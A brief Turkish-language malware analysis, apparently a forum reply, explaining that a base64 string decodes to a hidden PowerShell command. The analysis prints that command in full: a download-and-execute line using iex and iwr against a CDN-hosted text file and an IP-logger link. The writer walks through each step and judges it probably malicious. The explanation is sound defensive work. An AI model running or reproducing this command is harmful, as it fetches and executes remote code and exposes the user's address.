base 64 olarak encode edilmiş bir stringi decode ediyor. sonra çözümlenen stringi gizli modda powershell penceresi açıp ( görev yöneticisinde gözükmeyecek şekilde ) execute ediyor
ordaki base 64 string şuna karşılık geliyor;
iex (iwr 'https://bugijepakx1c.b-cdn.net/bambo/fijibo.txt').Content; iex (iwr 'https://iplogger.co/15fMB4')
iwr (invoke web request) internetten dosya indirmeye yariyor. iex (Invoke-Expression) ise exe gibi execute ( çalıştırılabilir ) dosyaları çalıştırıyor
yani sırası ile şöyle birşey oluyo
- önce bu kısımdaki
https://bugijepakx1c.b-cdn.net/bambo/fijibo.txt dosya iwr komutu ile indiriliyor
- bu dosyanin icerigi powershell scripti olarak yorumlaniyor. eger burda çalıştırılabilir bir komut varsa iex komutu ile çalıştırılıyor
- sonra iwr komutu ile tekrar buraya istek atılıyor
https://iplogger.co/15fMB4 burdan donen response yine çalıştırılabilir bir dosya ise iex komutu ile çalıştırılıyor
muhtemelen zararlı bir yazılımdır
